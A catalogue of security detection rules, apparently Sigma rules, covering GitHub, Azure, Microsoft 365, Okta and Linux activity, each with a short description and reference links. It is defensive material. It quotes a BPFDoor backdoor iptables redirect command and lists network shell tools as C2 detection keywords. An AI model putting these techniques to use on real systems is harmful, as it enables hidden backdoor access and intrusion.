Github Fork Private Repositories Setting Enabled/Cleared Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared). https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#private_repository_forking
New Github Organization Member Added Detects when a new member is added or invited to a GitHub organization. https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions
Github New Secret Created Detects when a user creates an action secret for the organization, environment, codespaces or repository. https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions
Github Outside Collaborator Detected Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed; when an owner removes an outside collaborator from an organization; or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA. https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions, https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization
Github Push Protection Bypass Detected Detects when a user bypasses the push protection on a secret detected by secret scanning. https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations, https://thehackernews.com/2024/03/github-rolls-out-default-secret.html
Github Push Protection Disabled Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules. https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations, https://thehackernews.com/2024/03/github-rolls-out-default-secret.html
Github Repository/Organization Transferred Detects when a repository or an organization is being transferred to another location. https://docs.github.com/en/repositories/creating-and-managing-repositories/transferring-a-repository, https://docs.github.com/en/organizations/managing-organization-settings/transferring-organization-ownership, https://docs.github.com/en/migrations, https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#migration
Github Secret Scanning Feature Disabled Detects if the secret scanning feature is disabled for an enterprise or repository. https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/about-secret-scanning
Github Self Hosted Runner Changes Detected A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runner configurations in the environment. Once a self-hosted runner configuration change is detected, it should be validated in the GitHub UI, because the log entry may not provide full context. https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners, https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation
Github SSH Certificate Configuration Changed Detects when changes are made to the SSH certificate configuration of the organization. https://docs.github.com/en/enterprise-cloud@latest/organizations/managing-git-access-to-your-organizations-repositories/about-ssh-certificate-authorities, https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#ssh_certificate_authority
Azure Login Bypassing Conditional Access Policies Detects a successful login to the Microsoft Intune Company Portal which could allow bypassing Conditional Access Policies and InTune device trust using a tool like TokenSmith. https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/, https://github.com/JumpsecLabs/TokenSmith
Disabling Multi Factor Authentication Detects disabling of Multi Factor Authentication. https://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/
New Federated Domain Added Detects the addition of a new Federated Domain. https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/, https://o365blog.com/post/aadbackdoor/
New Federated Domain Added - Exchange Detects the addition of a new Federated Domain. https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf, https://us-cert.cisa.gov/ncas/alerts/aa21-008a, https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html, https://www.sygnia.co/golden-saml-advisory, https://o365blog.com/post/aadbackdoor/
Activity from Suspicious IP Addresses Detects when Microsoft Cloud App Security reports that users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as botnet C&C, and may indicate a compromised account. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Activity Performed by Terminated User Detects when Microsoft Cloud App Security reports activity by users whose account was terminated in Azure AD but who still perform activities on other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Activity from Anonymous IP Addresses Detects when Microsoft Cloud App Security reports that users were active from an IP address that has been identified as an anonymous proxy IP address. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Data Exfiltration to Unsanctioned Apps Detects when Microsoft Cloud App Security reports that a user or IP address used an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Activity from Infrequent Country Detects when Microsoft Cloud App Security reports that an activity occurred from a location that was not recently visited, or was never visited, by any user in the organization. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Microsoft 365 - Impossible Travel Activity Detects when Microsoft Cloud App Security reports a risky sign-in attempt due to a login associated with impossible travel. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Logon from a Risky IP Address Detects when Microsoft Cloud App Security reports that a user signed into your sanctioned apps from a risky IP address. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Microsoft 365 - Potential Ransomware Activity Detects when Microsoft Cloud App Security reports that a user uploaded files to the cloud that might be infected with ransomware. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
PST Export Alert Using eDiscovery Alert Alerts when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually contains sensitive information, including email body content. https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide
PST Export Alert Using New-ComplianceSearchAction Alerts when a user has exported the results of a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect a PST export even if the 'eDiscovery search or exported' alert is disabled in O365. This rule applies to ExchangePowerShell usage and to usage from the cloud. https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps
Suspicious Inbox Forwarding Detects when Microsoft Cloud App Security reports suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Suspicious OAuth App File Download Activities Detects when Microsoft Cloud App Security reports that an app downloaded multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Microsoft 365 - Unusual Volume of File Deletion Detects when Microsoft Cloud App Security reports that a user has deleted an unusually large volume of files. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Microsoft 365 - User Restricted from Sending Email Detects when the Security & Compliance Center reports a user who exceeded the sending limits of the service policies and has therefore been restricted from sending email. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Okta Admin Functions Access Through Proxy Detects access to Okta admin functions through proxy. https://www.beyondtrust.com/blog/entry/okta-support-unit-breach, https://dataconomy.com/2023/10/23/okta-data-breach/, https://blog.cloudflare.com/how-cloudflare-mitigated-yet-another-okta-compromise/
Okta Admin Role Assigned to an User or Group Detects when the Administrator role is assigned to a user or group. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta Admin Role Assignment Created Detects when a new admin role assignment is created, which could be a sign of privilege escalation or persistence. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta API Token Created Detects when an API token is created. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta API Token Revoked Detects when an API token is revoked. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta Application Modified or Deleted Detects when an application is modified or deleted. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta Application Sign-On Policy Modified or Deleted Detects when an application Sign-on Policy is modified or deleted. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta FastPass Phishing Detection Detects when Okta FastPass prevents a known phishing site. https://sec.okta.com/fastpassphishingdetection, https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta Identity Provider Created Detects when a new identity provider is created for Okta. https://developer.okta.com/docs/reference/api/system-log/, https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
Okta Network Zone Deactivated or Deleted Detects when a Network Zone is deactivated or deleted. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta MFA Reset or Deactivated Detects an attempt to deactivate or reset MFA. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta New Admin Console Behaviours Detects when Okta identifies new activity in the Admin Console. https://developer.okta.com/docs/reference/api/system-log/, https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
Potential Okta Password in AlternateID Field Detects when a user has potentially entered their password into the username field, which will cause the password to be retained in log files. https://developer.okta.com/docs/reference/api/system-log/, https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data, https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm
Okta Policy Rule Modified or Deleted Detects when a Policy Rule is modified or deleted. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta Policy Modified or Deleted Detects when an Okta policy is modified or deleted. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta Security Threat Detected Detects when a security threat is detected in Okta. https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm, https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta Suspicious Activity Reported by End-user Detects when an Okta end-user reports activity by their account as being potentially suspicious. https://developer.okta.com/docs/reference/api/system-log/, https://github.com/okta/workflows-templates/blob/master/workflows/suspicious_activity_reported/readme.md
Okta Unauthorized Access to App Detects when unauthorized access to an app occurs. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta User Account Locked Out Detects when a user account is locked out. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
New Okta User Created Detects new user account creation. https://developer.okta.com/docs/reference/api/event-types/
Okta User Session Start Via An Anonymising Proxy Service Detects when an Okta user session starts where the user is behind an anonymising proxy service. https://developer.okta.com/docs/reference/api/system-log/, https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
OneLogin User Assumed Another User Detects when a user assumed another user account. https://developers.onelogin.com/api-docs/1/events/event-resource
OneLogin User Account Locked Detects when a user account is locked or suspended. https://developers.onelogin.com/api-docs/1/events/event-resource/
Default Credentials Usage Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts. Sigma detects default credentials usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management. https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists
Host Without Firewall Detects a host without a firewall. An alert means the host is not compliant. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management. https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf
Cleartext Protocol Usage Via Netflow Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that encryption is used for all sensitive information in transit. Ensure that an encrypted channel is used for all administrative account access. https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf
Audio Capture Detects attempts to record audio with the arecord utility. https://linux.die.net/man/1/arecord, https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa
Auditing Configuration Changes on Linux Host Detects changes in auditd configuration files. https://github.com/Neo23x0/auditd/blob/master/audit.rules, Self Experience
Binary Padding - Linux Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to add junk data to a file. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md
BPFDoor Abnormal Process ID or Lock File Accessed Detects access to BPFDoor .lock and .pid files in the temporary file storage facility. https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/, https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor
Bpfdoor TCP Ports Redirect All TCP traffic on a particular port from the attacker is routed to a different port, e.g. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'. The traffic looks like encrypted SSH communications going to TCP port 22, but in reality it is being directed to the shell port once it hits the iptables rule, for the attacker host only. https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/, https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor
Linux Capabilities Discovery Detects attempts to discover files with setuid/setgid capabilities on them. These would allow an adversary to escalate their privileges. https://man7.org/linux/man-pages/man8/getcap.8.html, https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/, https://mn3m.info/posts/suid-vs-capabilities/, https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099
File Time Attribute Change - Linux Detects file time attribute changes used to hide new files or changes to existing files. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md
Remove Immutable File Attribute - Auditd Detects removal of the immutable file attribute. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md
Clipboard Collection with Xclip Tool - Auditd Detects attempts to collect data stored in users' clipboards using the xclip tool. Xclip has to be installed. Using this rule on servers is highly recommended, due to the high usage of clipboard utilities on user workstations. https://linux.die.net/man/1/xclip, https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/
Clipboard Collection of Image Data with Xclip Tool Detects attempts to collect image data stored in users' clipboards using the xclip tool. Xclip has to be installed. Using this rule on servers is highly recommended, due to the high usage of clipboard utilities on user workstations. https://linux.die.net/man/1/xclip
Possible Coin Miner CPU Priority Param Detects a command line parameter very often used with coin miners. https://xmrig.com/docs/miner/command-line-options
Creation Of An User Account Detects the creation of a new user account. Such accounts may be used for persistence without requiring persistent remote access tools to be deployed on the system. https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files, https://access.redhat.com/articles/4409591#audit-record-types-2, https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07
Data Compressed An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. https://github.com/redcanaryco/atomic-red-team/blob/a78b9ed805ab9ea2e422e1aa7741e9407d82d7b1/atomics/T1560.001/T1560.001.md
Data Exfiltration with Wget Detects attempts to post a file using the wget utility. An adversary can bypass permission restrictions via a misconfigured sudo permission for the wget utility, which could allow them to read files like /etc/shadow. https://linux.die.net/man/1/wget, https://gtfobins.github.io/gtfobins/wget/
Overwriting the File with Dev Zero or Null Detects overwriting (effectively wiping/deleting) of a file. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md
Disable System Firewall Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md, https://firewalld.org/documentation/man-pages/firewall-cmd.html
File or Folder Permissions Change Detects file and folder permission changes. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md
Credentials In Files - Linux Detects attempts to extract passwords with grep. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md
Use Of Hidden Paths Or Files Detects calls to hidden files or files located in hidden directories on *NIX systems. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md
Hidden Files and Directories Detects an adversary creating a hidden file or directory, by detecting directories or files with '.' as the first character. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md
Steganography Hide Zip Information in Picture File Detects appending of a zip file to an image. https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/
Linux Keylogging with Pam.d Detects attempts to enable auditing of TTY input. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md, https://linux.die.net/man/8/pam_tty_audit, https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing, https://access.redhat.com/articles/4409591#audit-record-types-2
Modification of ld.so.preload Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md, https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html
Loading of Kernel Module via Insmod Detects loading of kernel modules with the insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded into and unloaded from the kernel on demand. Adversaries may use LKMs to obtain persistence within the system or to elevate privileges. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md, https://linux.die.net/man/8/insmod, https://man7.org/linux/man-pages/man8/kmod.8.html
Logging Configuration Changes on Linux Host Detects changes to syslog daemon configuration files. self experience
Masquerading as Linux Crond Process Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed. https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process
Modify System Firewall Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access. Detection rules that match only on the disabling of firewalls will miss this. https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html, https://blog.aquasec.com/container-security-tnt-container-attack
Linux Network Service Scanning - Auditd Detects enumeration of local or remote network services. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md
Network Sniffing - Linux Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md
Password Policy Discovery - Linux Detects password policy discovery commands. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md, https://linux.die.net/man/1/chage, https://man7.org/linux/man-pages/man1/passwd.1.html, https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu
Systemd Service Reload or Start Detects a reload or a start of a service. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md
Screen Capture with Import Tool Detects adversary creating screen capture of a desktop with Import Tool. Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations. ImageMagick must be installed. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md, https://linux.die.net/man/1/import, https://imagemagick.org/
Screen Capture with Xwd Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture, https://linux.die.net/man/1/xwd
Split A File Into Pieces - Linux Detection use of the command "split" to split files into parts and possible transfer. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md
Steganography Hide Files with Steghide Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/
Steganography Extract Files with Steghide Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/
Suspicious C2 Activities Detects suspicious activities as declared by Florian Roth in his 'Best Practice Auditd Configuration'. This includes the detection of the following commands: wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. These commands match a few techniques from the "Command and Control" tactic, including, not exhaustively, the following: Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132) https://github.com/Neo23x0/auditd
Suspicious Commands Linux Detects relevant commands often related to malware or hacking activity Internal Research - mostly derived from exploit code including code in MSF
Program Executions in Suspicious Folders Detects program executions in suspicious non-program folders related to malware or hacking activity Internal Research
Suspicious History File Operations - Linux Detects commandline operations on shell history files https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
Systemd Service Creation Detects a creation of systemd services which could be used by adversaries to execute malicious code. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md
System Information Discovery - Auditd Detects System Information Discovery commands https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1082/T1082.md
System and Hardware Information Discovery Detects system information discovery commands https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware
System Shutdown/Reboot - Linux Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md
Unix Shell Configuration Modification Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened. https://objective-see.org/blog/blog_0x68.html, https://web.archive.org/web/20221204161143/https://www.glitch-cat.com/p/green-lambert-and-attack, https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
Steganography Unzip Hidden Information From Picture File Detects extracting of zip file from image file https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/
System Owner or User Discovery - Linux Detects the execution of host or user discovery utilities such as "whoami", "hostname", "id", etc. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md
Webshell Remote Command Execution Detects possible command execution by web application/web shell Personal Experience of the Author
Equation Group Indicators Detects suspicious shell commands used in various Equation Group scripts and tools https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1
Buffer Overflow Attempts Detects buffer overflow attempts in Unix system log files https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml
Commands to Clear or Remove the Syslog - Builtin Detects specific commands commonly used to remove or empty the syslog https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474
Remote File Copy Detects the use of tools that copy files from or to remote systems https://attack.mitre.org/techniques/T1105/
Code Injection by ld.so Preload Detects the ld.so preload persistence file. See `man ld.so` for more information. https://man7.org/linux/man-pages/man8/ld.so.8.html
Nimbuspwn Exploitation Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800) https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/, https://github.com/Immersive-Labs-Sec/nimbuspwn
Potential Suspicious BPF Activity - Linux Detects the presence of "bpf_probe_write_user" BPF helper-generated warning messages. Which could be a sign of suspicious eBPF activity on the system. https://redcanary.com/blog/ebpf-malware/, https://man7.org/linux/man-pages/man7/bpf-helpers.7.html
Shellshock Expression Detects shellshock expressions in log files https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf
Privileged User Has Been Created Detects the addition of a new user to a privileged group such as "root" or "sudo" https://digital.nhs.uk/cyber-alerts/2018/cc-2825, https://linux.die.net/man/8/useradd, https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid
Linux Command History Tampering Detects commands that try to clear or tamper with the Linux command history. This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history". https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md, https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics, https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/
Suspicious Activity in Shell Commands Detects suspicious shell commands used in various exploit codes (see references) https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html, https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb, http://pastebin.com/FtygZ1cg, https://artkond.com/2017/03/23/pivoting-guide/
Suspicious Log Entries Detects suspicious log entries in Linux log files https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml
Suspicious Reverse Shell Command Line Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell https://alamot.github.io/reverse_shells/
Space After Filename Detects space after filename https://attack.mitre.org/techniques/T1064
Suspicious Use of /dev/tcp Detects suspicious command with /dev/tcp https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/, https://book.hacktricks.xyz/shells/shells/linux, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan
JexBoss Command Sequence Detects a suspicious command sequence used by JexBoss https://www.us-cert.gov/ncas/analysis-reports/AR18-312A
Symlink Etc Passwd Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd https://www.qualys.com/2021/05/04/21nails/21nails.txt
PwnKit Local Privilege Escalation Detects potential PwnKit exploitation CVE-2021-4034 in auth logs https://twitter.com/wdormann/status/1486161836961579020
Relevant ClamAV Message Detects relevant ClamAV messages https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml
Modifying Crontab Detects suspicious modification of crontab file. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md
Guacamole Two Users Sharing Session Anomaly Detects suspicious session with two users present https://research.checkpoint.com/2020/apache-guacamole-rce/
SSHD Error Message CVE-2018-15473 Detects exploitation attempt using public exploit code for CVE-2018-15473 https://github.com/Rhynorater/CVE-2018-15473-Exploit
